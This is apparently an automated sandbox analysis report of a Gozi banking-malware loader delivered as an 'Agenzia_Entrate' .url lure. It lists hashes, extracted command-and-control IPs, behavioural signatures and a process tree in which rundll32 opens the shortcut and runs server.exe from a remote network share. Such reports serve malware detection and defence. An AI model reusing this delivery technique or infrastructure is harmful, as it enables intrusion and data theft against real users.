Analysis
-
max time kernel
143s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
09-03-2023 08:42
Static task
static1
Behavioral task
behavioral1
Sample
Agenzia_Entrate/Agenzia_Entrate.url
Resource
win7-20230220-en
General
-
Target
Agenzia_Entrate/Agenzia_Entrate.url
-
Size
191B
-
MD5
c57ce09111a84d1110b24a8505ff5804
-
SHA1
9fd1e2577f10a24c2678803e073d35e41b551eb2
-
SHA256
257413c17f63500a76f9d0216a8dee283021299a61dc0539e6e870fd5d78177b
-
SHA512
71cf1e5d069a75be84cfcaf82479fb037e75055c05e94ad212453769288b1e3b194156fad802619b0850c9e9abb3c045600779de234b8b51505b1a54f46b7c84
Malware Config
Extracted
gozi
7712
checklist.skype.com
62.173.141.36
31.41.44.85
193.233.175.98
46.8.210.110
89.116.227.49
-
base_path
/drew/
-
build
250255
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Extracted
gozi
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
rundll32.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
rundll32.exedescription pid process target process PID 4892 wrote to memory of 4508 4892 rundll32.exe server.exe PID 4892 wrote to memory of 4508 4892 rundll32.exe server.exe PID 4892 wrote to memory of 4508 4892 rundll32.exe server.exe
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Agenzia_Entrate\Agenzia_Entrate.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4892 -
\??\UNC\46.8.210.57\Agenzia\server.exe"\\46.8.210.57\Agenzia\server.exe"2⤵PID:4508
-